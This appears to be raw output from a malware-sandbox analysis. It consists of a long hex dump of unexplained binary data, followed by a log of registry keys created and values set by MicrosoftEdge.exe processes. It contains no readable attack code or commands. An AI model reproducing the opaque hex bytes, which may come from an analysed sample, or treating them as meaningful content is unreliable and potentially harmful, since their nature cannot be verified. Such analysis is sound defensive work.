a2a9ee3f000040e92e56ee3f00006010e647ee3f0000a08f8a74ee3f000010f75462ee3f0000c0565413ee3f0000b08eef00ee3f0000f02e010eee3f00007007993fee3f00006068f52cee3f0000a0319ad9ed3f0000504309c8ed3f000070fda5faed3f0000101037e5ed3f0000305b2e97ed3f0000d01e9d81ed3f0000002b49b0ed3f0000d0af0fa2ed3f0000408db3aced3f000060739e5fed3f00002072c949ed3f0000a029207bed3f0000e0590e65ed3f0000e0022717ed3f0000b0b4d006ed3f0000504ffd30ed3f0000c0f2c222ed3f0000201fc12ced3f0000703448dfec3f0000b0f258c9ec3f0000e0d911fbec3f0000103a1ce5ec3f000050435797ec3f0000000000000000000000000000008faf92909eb6b88fe9d9231d5a66be8c6a85ac96e5985bf354040f597fb720ee6a6908934fb0aec936b45edd542b87f92cb463a6ad4470c4a2b1313f4f0d9fc0f070676233c4a6d4282572ad3750883e93d4528db5170c36fa173d2ed780923b3c4b9d79da3de790333e07c7cf497830fd35f04190b583dc29a8f152d3cd0738815a13a7b11319d7d618e90415717337f9c5c2b0f92a63fd6c969057002e3e2e3060a323ee5b4e2b911ab67359af59e250ce95850aee472e71a5ec4c8283582d93111d3f4499552814c01d4313c17b23d1130bcfd85244cbb57880b692bd1ace8e79f033007b763a99fa7ac068ff6d23d95ec806e941c0215e660cad18982f362aa8f152d3cd17286505347ae6c1313875291e8de279782c0458e24e7c8c3737e04a81fc38e1242a0f912f9f007b76237fb348b1971b912815971af85f09f7c2510ba10bf08b9f1712876f78902e29157a21b8a0adc7eec4a3a934543720552b5e7b61ee1f5add3240d7d55b42c8ba2997f6c05a88c5992fbc52d666a4d50629c6f0390d1227261104dbcac826d10329a4d53c8e5a1c9d18bd0764553a7b09c0a89e468a5cb40c1d2d1f7531a09b8ac453369eceb470d220a6d218ab10fc341f86890068195738110b0d5c41ae44d425be6d6696b5f74021da3df0d0b4076e1aaa982efaf8b88a2c37eae797db432114c09bc30dfd1b52215d32672f899c2d1f08117ea78677f7c5f7d6d4edadda422e541e19102ec675dd5d660cad18983f2602afd6a94418b63897722eeee3a24a2e2bc08073dc18f529815b4a1153b554339d9c57b2f5a4962309000dc720659c1a3a16bccf1ffc912da190e6a032f7a0122344ce82e51ac317084d4a5fc80cb3276b53747b5f245c106af8d686cf2f3a186cf0c3aee44d4f170e17e3d5d98b5b2608fd9151b0df441e9aa526a388383e34e8aff63ae0db9424a407c3c2bd0cc4d457978272eb855c012a773288d795b5103239577b89b30a17bfdf2640b0e75d0c91090de726
316005226af852b648d2cdd0f7200be69d7602299afe0f948c712b267eec7b1d63bc0d581001826b0caf0386182d7dcb737107187ef244e0d3e605848d355b8419fd07f90d210b091ae92492a12aa5d19dfb0b84039379273b76076ad20e1db2133339cebba8e80b5a5632bc52d666a4d53619c67461599125251b9e72203c455aff106a217f062206091ff46dfe6ac0837d331b65e8bb6d0154152097a8e2ad5e030d6e25fe88fb3ff8015a79ca5bb9858e004ae011a7eabe4c04dd65588c94c8330391f7de662c688b11a094ca127026bf05ef8a99304215851ea76fad7942b6eb0309c76b1e8abeb936df2a5b2596abb600c86088ede2022508a495adfedb9831109b1c80703be7b912dcba6644ef903d060a379c75ccd7de11375fd8d7aca66a07768c92ae97aef708ca9593fd2de9ef1a9cf16ee8f5c1d40b68a47be81e2d68043193482b03aa6e06e40dffaaac223c0ede3f9bd044c3e2cc9bffb3e46d73351b2fc6e53d77560818f137e80ac3e7d3d0b8488635342f461d1f8c2dc931235e3b5a0adf65f9020e1f32f9cce07469f309c27cf113e6933f165f28a826a533bbd75e32672f899c3d0fb6fed78a66710b09bfbcd409454dc214918e37e636769a14583d86a9ff952e0eaac0ef57834f0d133ecc833df93f44cd14cb836a149cbc019113bbc3538de2c5971d7cd770441600ad99286b42684b1662708e63d41ef4c27b4f15fba211610bbbe86bfec8d6dd050755b5292f46bc1bbf313f3e3449fa08f660b61e6d2a730a21ccc58816b70809b9ad53741d47640dc8f760cfd7a8ea05dc14359546b3af32c5f394fe125815030158b552b882800498db54e2f8051a123ce80576a1bca51fd8ee28bd5405f7056e836ef941053806df8b0a46e453ba15e1f49d90f9a55014f7a7ec4a87396e26ce9867ead8725021dd76ec0cbfaa97ca7a16d153ad189ac152b0b573efc5040955e8bdcde3a798112d0374ded4e6b1072496237fb83ba8c64c58a49672e5b90bc5f3654f47f16ac3aa973f3978266b0d26878d10e5ff2e086af8d686cf2f2a08742a688c22a138011f75c0705b8b0802353b714ffe4189065d78cd52c6017c0108424d67576a5904e0c7a0efd0c4760a987f6bb39358fc08228fb910b8ba1f190ea2851986992d02c0ac3fe051e10c0f29fecbab5c3bdd0d6e8db6ef16cb7017b5ac09711296d633faf1332cdb5454cc090810a478b204786019b1513c75c414da842ac9fc346d1810573aa1a04f24173f4e5c1b28076b72659419c038563274762ebca3250c147a1fec80a73e7de5728269a91e5f4054172db91645a5ed911ee3abb9ac437b6a0f766f8d591565aa17aa7d160b902873013155b294c604f878861ee8b394f5a705950ffbdc26cf4115ef3ce276ba
0f8f7ddeaf0f84888ce917a345ad0f3138337e2c04f624c0405f25aadc860ca7a0857ef3f8ec9855d3f40d7075503ec736d64f7e9f9d420af3da1eca2d3aea79ffa1107bcf8e8f7ded507568ff53258dbcd00083d881e409622e7b581001826b0cdf735e82d5b124cc2676ce52aefd5eca23784a98a4e752ec3e11f91675229da5f2725b13de56a5eb951b23575010c80c8f7fa104db4a55928c7f4e2076ee9e60737b5e420a1deda64909ec6bf9708cab331acc1d96029461ce7ed7be8be556a88a7369a3f8ab3497487232aa036b1855c97484ed92c87da6e60e34b755fa7ea58d7a2b36c0708a3511037cc0dd4c32e6e51c4309ae9773a4bd19158ce628f66704c10c39f9f3a5ee681fe5aef4fd37e6e37034ed849dce59277011c13767b8e7a07fac8eed73a943451342d87f5379f63d04c884b3ec19cdb97e1b1b5cbce1d0ec3d3e00000000000000000000000000004060c0ffffffff1fc0cff7fbfd7ebf3fc02de8fbabb6bd5ec01fd8799ee7797ec08a6e7b0cbc739cc04e3308d4fb21bbc08abf2967b2d3dac03717638c31c6f8c03d8ccbbd3f2e17c1ff2cedb2b4cb32c1d4eabbc0fa2e50c158d0475b9aa06fc1dbb4c732bf6e8ac14b91e4c8f36da9c14c69c6a5e8abc4c1210000000000e0c121fee11ffee1ffc1b50c7e1b353318c2f5d7bd7cddcb37c2e45a38cf16ce53c2b5f5613dd1606fc20b1894ece2c18ac28dc007f52cf0a1c222c9955cc995bcc22541a75f8f0bdac24bb4aee13ab9f1c2f979fb18329c0ec33490988adf8e24c3d82cca97fbd342c3ae70bf5bb61758c37dc871a17cad77c323dbb66ddbb68dc3b9cf44dc45cca4c3cf083bc28eb0c3c323bc8e178c93dac3df2041820409f2c3b4060b686d760ec4c8f1921da2f626c44445b6ed98393fc4ef6a7bd5ed5557c41cdce733358b6ec4b4b8e9e7511186c43aeb505d01879ec47054f35c35cfb5c4f1c8de92027fccc4e659ec2c7616dbc49b86fbe87a42f2c417870e1d3a7408c561ce04eb973321c5246bb5df6ab53fc5c2166ca832b255c581dd090a8f7762c566b8d161b76478c55277ca76a76c97c575c0e26f4616adc525bee55bbee5bbc59fbcd942ad06d6c53d4931832ac5ecc525baa11bbaa1fbc5e6ea23851b6215c61245037c88482ec63da345aa9f133bc6e5ca45bfce8a57c6a5030000000060c6c03f4e8322aa7cc64dcab4f41c9489c691d994e8b0e7a5c6df093f2a4cf8b1c6d9cab7e4b9f2cdc616cb3299b2dbd9c6ea4591135d42f4c6c5e284134e3801c70008c68b28b41ec7eccb28bd8cd22bc705c59de24e7147c795599864b61554c7a31588f7365961c775fa1b5b15637ec7862b527c9b538cc7279ee7799ee799c72b127ebac24fb7c7e2630cc8edabc4c79f0426834b
60d2c7270000000000e0c7391e78e08107fec77f3f7efcf8f103c82252150b74c715c8cbf1783c1e8f27c8437d2fbc210d49c8fc2f0ce82a8f5ac8b4b28fddc1316cc8f76cdcf9cdc67dc832cb5c8b19718ec88e189dd038bb90c8521874c3089ca1c879514a29a594b2c8b273bf8435c4c3c883629839570cd3c83675e0f1156be4c84ff18a57bce2f5c8287792e4769204c9f8f074289c1617c95ea949a7807727c9287badd77aad37c90227b9a943f847c9afe22182ed9d57c9ff1058b27dd667c9287fe9977ee977c9257d6637a9ee87c9c6db733b868d97c99ce971beca1da4c95b452a52918ab4c9e11e4a32ee65c5c97f2263768dd9d5c9ab3a9f59dba7e2c939104e38e184f3c9c3d1041d509203cad8f2c568e3bc12ca9a470e2fa4bf2dca684783b8a3413ccaae6bbd817a064fcaff9a5b6a6ea959ca9566efd290fc68cad2b5d9b1e25c7bca5f655d5957d675ca05513b6cd19c84caddb02ec62df496ca6a0000000000a0cac17c395dc362b2cad4e4fbbc4130ccca744eadfea9d5dfca2aed1a08ed1ae8cafa01d5f0c32dfaca2a4551144551f4caa4d791bfed7c07cb063c2a88470511cb7360f062fd9b2ccb51c18aa23f723ecbde6e297be38349cb64e4edf276795bcb754b77dbd2dd56cb58b76251daac61cbbfc84923278d7ccb446fbae9a69b8ecb5906396dfaa399cba5553a320cab94cbf5bcb1253b8aa7cbc422bb079dbeb2cb72a3459b171dcecbb898caf0434bd9cb6e0807789395d4cb2b0000000000e0cb59036bdf5385f3cbc4e8a38f3efa08cc38a80ae7cd611dcc3dab4d5890ce11ccf9b3df3b480c26ccd84cd0df315c3acc6a7c0afab9dd4ecc2b2f8aa2288a42cc1deab2421c8156cc5c1c673430856accb1866eb5f1af7ecc2b2cb9922bb972ccd1ab8c188a2e86cc774fd92d7ee49accc7d2b5c09193aeccfeb953d0e74ea1cc7955f34cd53fb5cc8d0eeb0cbfdec9ccc5e77787b173dccc80af3b61a9c0d0cc895d02b12f6febccaf41e1311814fecc5f62c6eee2c9f2cc57478e1c397204cd749a2f5fefa519cda817cb8be5c512cd9ff07d2c0bdf27cd9f8cadccb6323bcd2e266dd477474ccd7f6b2aaca9b046cd3ac432618eb55bcda18cf6cd68df6ccd9aa1bce329e161cd2ca3389aa2387acd72836f99c2878fcd0a12a639e82381cd1826d7aacfdb9acdce6312f0527caccd8dc5e6efe3cea1cdadb66ddbb66dbbcd643b77802089cccde06326e22e62c6cd1538b282232bd8cd4783daa036a8edcdd9b31dc8f96ce7cde619a76b4b4cf9cd2d3221133221f3cd4f6fdebc79f306ce73f4c743c8181dce4bcc8704d40d13ce82f76449922d29ce229c230fabc93ece66b9fce0dee734ce16c4ab060af14acedc5948951bcd40cea9ed617bd8
1e56cea18ff1f9189f6fcea33e2e0cd3c765cee4f0bb13333a7bce2d0a9990099970cebb52cd0293fd86ce460a31cb8f689fce3e33ceacdde995ce322a522a4145aacef61c285e1ae8a0ce04f6c7045117b9ce1b6373b98331cece2ed9fd24d9fdc4ce936c2d6402a7ddce0c036dbabf7bd2ce196eefbe292aebce2e0000000000e0cebf9011bf45fcf6ce2ee10eeee00e0ecf9d879649171805cfaf0c7a8d9e191ccf2e71e2d753e214cfa9d0c92788fb2bcf05a4ab63129622cf04e166f33eb839cf4e30ca0d216730cff755b8c90a5147cf8a59c25c5d805fcf98b778628b2756cf5fe32c097d466dcf6b5d083806aa65cfdd8710c618277ccfbb94524a29a574cfdd085291b6e48bcff931b04d2c5583cfc4e96be529df9acfc35558239f2f92cfb9f307d24eb7a9cf3b30e32060c6a1cffaa172da8500b9cf2f1445511445b1cfc3bbc53571fec8cf254441aa24a1c0cfd6c05e8b984cd8cf370c0683c160d0cf084d2b67123ce8cf2f0000000000e0cfbf800103060cf8cf3f0000000000f0cf3f000000000000006c0308560130000043434f4f4e4e4f4f55555454242400000000000000000000ff0000000000c07cbc0000000000c0fc985b252573735d5d2d2d2d2d3e3e5b5b252573735d5d2d2d2d2d3e3e5b5b252564645d5d000000000000000000000000313178784545787875756a6a4a4a75756e6e797952525656474738384d4d57576e6e454567677878646448486b6b5656777757573737787853537a7a6e6e74745a5a00000000000000000000000000006262636331317171646468686d6d3030737330306d6d67677676303038386161616138386b6b38386a6a39393636646468687a7a7777323233336d6d3737737368683434787830306161737338383737797964640000000000000000000000003333313171717575484876767a7a4a4a6868414134346b6b56564a4a4a4a4e4e6e6e37376161353545455050585873734c4c363671713939737358585050737371716d6d000000000000000000000000303078784545303034343838313145453232363661613030313131313737373732323131363639393838636344443535424238383939363632324141303039396464383835354646333330303939353566663636000000000000000000000000545457574a4a73736363333354547373505035355a5a4343626258587a7a3333414173734a4a50504545616145454d4d76764c4c37377777656544447878545471714a4a000000000000000000000000727268685a5a454577776b6b4545545434345a5a7272777753534848424270707272636361617878343456566868535366667070686865657a7a59595959636366666969000000000000000000
00000044444d4d515168686969797957576161383859594e4e656573735656383854547070535343434e4e4242575737375858585859597171656559596969565652526363373700000000000000000000000000000000b8495ccd600000000d0d0000dcde0200bc8b3601bc9b260100000000b8495ccd600000000e0e0000000000000000000000000000000000000000000094940000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005051818101000000000000000000000000000000000000884ac280810100009052c2808101000000000000000000000000000000000000000101000000000001010000000000000000000010495801f0c53401c8fd340100000000000000000000000000000000000000000000000001010000083e37010000000000000000182e3701000000000000000000000000104958010000000000000000ff000000ff00000040400000f0c53401000000000000000000000000010100000000000000000000e8b05901685e3701407637010000000000000000000000000000000000000000000000000202000080b63701000000000000000098ae3701182e370100000000000000000000000000000000e8b059010101000000000000ff000000ff00000040400000685e370100000000000000000000000001010000000000000000000038615801e8de3701c0f63701000000000000000000000000000000000000000000000000030300000037360100000000000000002017360198ae3701182e37010000000000000000000000000000000000000000386158010202000000000000ff000000ff00000040400000e8de37010000000000000000000000000101000000000000000000006831580170473601487f36010000000000000000000000000000000000000000000000000101000088bf3601000000000000000098af3601000000000000000000000000683158010000000000000000ff000000ff00000040400000704736010000000000000000470417184c10100000a9a9002e5a111d0c5049036e00000000b9b900202000002e5a111d0c5049034a1400302099b900606202002e5a111d0c505c7800c0c000888a02002e470d051515451135000000884ac200101000002e1e005305016700985ac200080800002e6d1106707c1b0241000000a062c200080800002e6d1106707c1b195a000000a86ac200080800002e6d1106707c110841000000b072c200181800002e6d1106707c110a43000000c80ac200080800002e6d1106707c11135a000000d012c20008
0800002e6d1106707c081141000000d81ac200101000002e6d1106707c080858000000e82ac200080800002e6d1106707c080819410000f032c200080800002e6d1106707c080a5a000000f83ac200080800002e6d1106707c0c154100000000c3c300101000002e6d1106707c0c0e5a00000010d3c300b8ca72002e5c160515156100c8fd3401f4f501002e5c16051515455672000000bc8b3601dcde02002e5c16051515455e00001e060567000098a23b01080800002e5c0617476d080041000000a09a3b01080800002e5c0617476d13005a000000a8923b01080800002e5c06174770150041000000b08a3b01080800002e5c061747700e005a000000b8823b01f0fa0a002e561c0515156100a8ed4401f8f800002e561c051515455c78000000a0e647015c5c00002e4b010515156100fcba4701282800002e470d05151545163200000024634601141400002e470d051515451733000000387f4601888a02002e470d051515451034000000c0894801cacf05002e470d05151545123600000000505101e8e008002e4a051515610000e8b05901a8a800002e4a05151545567290c95801607313002e4c11007300000000707101bcb10d002e5e14051515610000808101808000002e49010f0d17575c7800000080008101303000002e49010f0d17575d7900000000909101606000002e5c0101114714013100000060f09101808101002e5c010111471402320000000000000000000000000000000000000000000000000000000000000000000000190518040a0b222303636252b052b20000010100218ca904ad991327087c5c283025150001171600b8823b0121290a0208eccd2901171600aeb81600ccf63b0121290a0208fcd622aeb81600bdab1600e4de3b0121210000aeb81600bdab1600e4de3b012121000001171600aeb81600ccf63b01212100003025150001171600b8823b012121040400745c28003413273025150001171600b8823b012121020200745c283025150001171600b8823b010105050104464200212407020531300490881800a9b1180068533a01212102020034300490881800a9b1180068533a012121000090881800a9b1180068533a01015e5b045f6b3c0806545072700000000101000001090901084a420001080801096b6200010b0e040a3e390d0a78747671090c04087a76747363623221041d0815617d091571630715213206152723f100cc2c0001010000130c1f00a0bf1f002099b90000000000111e09060f6b6c080f3b32060f3d397b90cc2c00010100003a1a200058782000378eb9000000000009131c061a2e3b0f1a6864f6f464637380cc2c0001010000bd9d20006746210053eab900674621000107040206545052590d050104
262200e0cc2c0001010000e7c32400725725008930b900725725000103030102525000010c09040d393e0a0d7f7456510c09040d393d090d3f34565114100515218eba1514b9b8065650000113140612667c08122633071220395b51010000011d100c1c7874101c485b0f1c283a0e1c6e6ae8e6f6f4c4c2d2d0607101000001141d08157176121521251115a7bceeec7c7b5b5106050207069a9b01010000010100000101000001080b02093b3735311d100c1c78680c1c485f0b1c283e0a1c2e2ae8e6f6f4c4c2d2d0607118130a196d7d09197d6c08194d5307192d3206192b27f5f117040206343032d0cc2c0001010000d6ec3a00ecd63a00a118b90000000000010b0e040a3e32060a3834766900130a19fded09196d7c08197d6307192d3206192b27e510cc2c00020200004b763d00a9943d00b70eb900e8d53d002f123d00eed33d00d26bb9000000000001121b081327380c13415efcfaeae87877676656510e0b040f3b32060f3d397b7119120a187c680c184c5f0b182c3e0a184a46e4e2f2f060711310021260795b510a0a010b696200011c110c1d697f0b1d796e0a1d495d091d293c081d2f2be9e7f7f5d5d11e0b040f3b32060f3d397b90cc2c0001010000dd994400e7a34400eb52b90000000000110d160a1c786b0f1c283a0e1c6e6ae8e6f6f4c4c2d2d06090cc2c0001010000266345007a3c460005bfba0000000000090f040206343032d0cc2c0001010000f4be4a00014a4b0001010000014a4b00010b08020a38343631080b02099b905251080b02097b7052411e0b040f3b32060f3d397b90cc2c0001010000e5ab4e00f5bb4e00eb52b90000000000111e0b040f3b32060f3d397b90cc2c00010100009dd34e00b3fd4e00eb52b90000000000111e0b040f3b32060f3d397b90cc2c00010100003d734e006d234e00eb52b90000000000111e0b040f3b32060f3d397b90cc2c0001010000256a4f00337c4f00eb52b90000000000010e09060f6b63070f3b32060f3d397b71040702057175010118130a196d7b0f197d6a0e194d590d192d380c198b87f5e10b0e040a3e33070a3834767105050104666200193727091d79a0c41d29f7c31d1cbfbe0eeeec7c7b5b5000e052b200e0e505000118130a196d7f0b197d6e0a194d5d09192d3c08194b47f5e11d160a1c2820141caea7e5e3f3f1c1dfcfcd7d7c6c6b5b511c110c1d69790d1d79680c1d495f0b1d293e0a1d4f4be9e7f7f5d5d93c2c0913270d39131231300cfcfaeae878776766565000e052b20070710100111b0e040a3e33070a38347690cc2c0001010000aec769000c666a002298ba0000000000193c2f0a1642451116222410166460e2e0f0eececc7c7b6b8052b200383800000107040206
74703229322c071a6e80f41a2ec7f31a1bf1f00b5b5000e052b20070770700010e09060f3b380c0f7d7a7877676656411e0b040f3b32060f3d397b90cc2c0001010000690b620072106200eb52b90000000000010e09060f6b6f0b0f3b3e0a0f7d797b7118130a196d790d197d680c194d5f0b192d3e0a196b67f5f117040206343032d0cc2c0001010000522371006918710078c2ba0000000000011d170b1c6863171c7872161c4841151c2820141c1d131215f5e00001141d0815617c081571630715213206152723f1e1151c0814706c0814405307142032061426226071060601074542001101170710928efcfadad8c8c676756564343000e0cc2c00010100004b3f7400453075003b81ba0000000000111e0b040f3b32060f3d397b90cc2c0001010000bac87200d0a27200eb52b90000000000111704020634307290cc2c0001010000ed94790003797a005fe5ba0000000000111b0e040a3e32060a38347690cc2c0001010000afd27d00c5b87d005fe5ba000000000001141c091561710515716004154157031521360215f5e00019061a050d0c898806e6e4c4c2525000e052b200000404002109220a28dc778320f45084186cf1851074e286083cb38720a080007bfb8000e8a940012121000020a080007bfb8000e8a940010116110617435f0b172521e3e1f1ef7f5134130615d1ce0a0d696d0905313c08502f7f0067187f003476430121210000502f7f0067187f0034764301190a120104a6a200e052b20040400000010b0e040a3e3e0a0a787476693420382a6b60141b7f77131723261213203dbcb8faf8e8e6d6d4c4c2525000e052b20050500000010e09060f6b75110f3b24100fddd97b693420584a6b60141b7f77131723261213405dbcb8faf8e8e6d6d4c4c2525000e052b200585800000115120614706307142032061426226061041d0815617e0a15716d0915213c08154743e110cc2c000101000018958d0065e88d0078c2ba0000000000010704020634303221051c0814706a0e1420380c146662e0feeeec7c90cc2c00020200009a0a9000e0709000912bba00000000005dcd9000ee7e9000ab11ba0000000000111b0e040a3e3c080a58547690cc2c000101000072e39100f1609100c47eba0000000000010f0c020e3c383a31191e06184c5307182c3206182a2674711e0b040f3b32060f3d397b90cc2c000101000061f49500bc299500dd67ba00000000000107040206343052410a110a1b7f680c1b2f3f0b1b2925e7e5f5f3c3c1d1cf7f90cc2c0001010000821e9c00b22e9c00f74dba000000000001161d0a1723231717a5a2e0feeeecdcdacac878776766564931220a1a2e2c181ae8e2e0feeeecdcdacac87877676656b052b2007070000019
3424091b4fc492192fba8c191a8b880ceeec7c7b6b6000e052b2004054140019283a0b1f4bc2941d2ba0961d1e8f8c10e2e0f0eececc7c7b6b6000e052b20060741400010b09030a626a0204a6a200111e0b040f3b33070f3d397b90cc2c0001010000fe58a60008afa7000eb5bb000000000001090a02089a9634293f2f091870660e14151f1e09e9e7777666653534545000e052b200d0d000000107040206141032310a08030b636d0507c5c20001090901086a6200111e0b040f3b32060f3d397b90cc2c000101000015beab0055feab00dd67ba000000000001050501048682000105050104060200011a13081b6f7d091b7f6c081b2f33071b292644590609060f6b6d090f3b3c080f3d397b90cc2c00010100009223b1009928b100269dbb009928b10009030e040a3e32060a38347690cc2c00010100006ddfb200a012b20060dbbb00a012b20001030301023230000105050104161200010100000000000001010000000000000000000018322a0000000000c88d44010000000000000000000000000000000002020000e0a54401084e470100000000000000000000000010100000e8b0590100000000ff000000ff0000001818000020092900000000000000000000000000000000001049580100000000ff000000ff00000018180000e0c929000000000000000000000000000000000018322a000000000050164701000000000000000000000000000000000303000070364701e0a54401084e470100000000000000000000000000000000000000003861580100000000ff000000ff0000001818000080a92900000000000000000000000000000000000000000000000000b8495ccd60000000e6a04701010100000303000003030000c88e4701d4924701e0a64701302b1b00f0e91900405b1b00edab4701f2b44701f6b0470100000101020242016d4a08006c6907071d7472071b6e73071b1f7000387f4601000000000000000002484b0100c0c00080c94801000000000000000096dc4b01488ac2000000000000000000000000000000000000000000c089480100000000c881480100000000d69f480100000000e4ad480100000000f2bb4801000000006c234e01000000005e114e01000000004a054e010000000038774e0100000000a2e84b0100000000b6fc4b0100000000d09a4b0100000000e4ae4b0100000000004b4a01000000001e554a010000000032794a0100000000460d4a010000000062294a01000000007c374a010000000092d94a0100000000a8e34a0100000000c2894a0100000000d8934a0100000000eca74a0100000000feb54a0100000000125e4d0100000000206c4d010000000038744d01000000004c004d01000000005e124d0100
0000006e224d01000000007e324d010000000096da4d0100000000aee24d0100000000c68a4d0100000000eea24d0100000000fab64d010000000008454c0100000000165b4c0100000000206d4c01000000002e634c0100000000400d4c0100000000521f4c0100000000602d4c0100000000763b4c01000000008cc14c0100000000a2ef4c0100000000b8f54c0100000000c4894c0100000000d09d4c0100000000e0ad4c0100000000eca14c0100000000004e4f0100000000105e4f0100000000226c4f01000000002c624f010000000038764f0100000000440a4f010000000056184f010000000068264f010000000082cc4f01000000009cd24f0100000000aee04f0100000000bef04f0100000000cc824f0100000000de904f0100000000eaa44f0100000000f8b64f010000000008474e0100000000145b4e010000000028674e01000000007c334e0100000000000000000000000086cc4b0100000000743e4b010000000062284b01000000004e044b01000000003a704b01000000002e644b0100000000105a4b01000000000000000000000000c0c4573f09001570bbb9452b030d030d2d2d00030c63c2c0452b030d030d2a3417006500c6c4452b030d030d20230c086b00cdcf452b030d030d393b02030c086b004b0e171c0b097f011c4a08006c00cecf483a302f0519120d0e131622291d1f0c1535371708050d030e0965003b38740403021b071a1231578c8e513611372f0519120d0e13162025151561001819462211372f0519120d0e1316202515156100d5d545281d040d3a2f0519120d0e131664004949432f031c16262f0519120d0e131664002a284d3f150b2d2f0519120d0e1316645506161761011c4a08006c00181c5626182f221104010717262c011a111d0c741f1b562618202300041e0536331b0d171d06012b2b1a060b790026225626183a3f1b0601140d393b191e070a6400e2e6513b06090f0a080901213d1b0615041d0601282f051811177200b3b7573611213b06090f0a080901213d1b0615041d0601282f0518111772c6c746221137360700170b1a24221d0c06160073ceca5031171f04070f151135221d0c061600730006054a3a23221d0c0616001c1d3423041501071735221716160b1a74a9aa522410170b29351714091d1f0c0f0d06262c1a1b1a111772c7c646221137360700170b1a24221d0c0616003a2d64cbca46221137360700170b1a203c1a1704052d2d64008082452211272a0a071108393d04082432352f0509313d040865efed4b27071d1d080d05131f361f251a073c2d04056402014a3a372107171200021722221716160b1a746a68452211272715130601053927080938571e1c45221139220b1119092d290f0a
08093257002521562618393b191e070a213d78f1f34b271a11171e030c080e01222a19061b3b1f251a077421255626183c33373b292f05092d2d0405011772b4b75133081a16203d1b0615041d06016e00080a452211382d12073137001d1d72008084573611382d12073137001d1d7200f2f2452b1a111731311b1d1d0a020d3f3606171d06016e003b384f2904171326311b1d1d0a020d3f3606171d06016e00d2d244210909111126311b1d1d0a020d3f3606171d06016eebe94b27071d1d080d05131f26311b1d1d0a020d3f3606171d06012f2f0a372319072d2c1a1b1a74d3d750381f322d00030c6300d5d150381f34221122370d191065d6d250381f20361122370d191065d4d050381f353417006568694734170029250b1013130b794c4e45221124221d0c22250016171600730040434f230e0528250b1013130b3c3d2f57001f1e443d111d24221d0c061600731d1f45221139220b1119092d290f0a0809203d2f5700191b45221139220b111909232f05092b2f0c08244100696a4e3819181d2b3b0d11313b383e0d01262b0913722025523e0d01262b0913263b223819181d2b3b0d1165d7d54a2d0411363417006500d3d14a2d0411312d00030c632f2c4f0f0e2c112327061b07093057003435472f070a272f031c16653938472f070a222f1b0107322f0509203d3941004948472f070a2a2b1d0c322f050924410c0f4a3a25370d050d272c0b0135310602656e6f46221135021350003e3c4522113b0a080e13500078794622113713192708096f8c8d462211372c02000c0f0a2825070b24418d8c462211372c02000c0f0a2825070b3257e1e0462211312b181f1b1d0103080b1a2727061b070914245700676647341700202b181f1b1d0103080b1a2727061b0709142457515345221124221d0c0616003b2d041170006b694522112727102c290f0a08096500fafb462211322f0509312d09156570724522112727061b0709332d0915325700dcde4a2d0411233a131f6500dad84a2d04112237242d00030c6394905736112727102c290f0a08096500343152251b1d11232f0509655d5c472a19061b2e2f0509273713000317017300a0a1462211372c011d1c030926135000b2b3462211372c011d1c030928220b0165007571573611322f0509353f06071a1117373d78005252432f031c162d290f0a080965333652251b1d11262c011d1c030932578f8f433117041511232f050932570000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
svchost.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405" MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe
Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 033589468b96d701 MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1" MicrosoftEdge.exe
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe
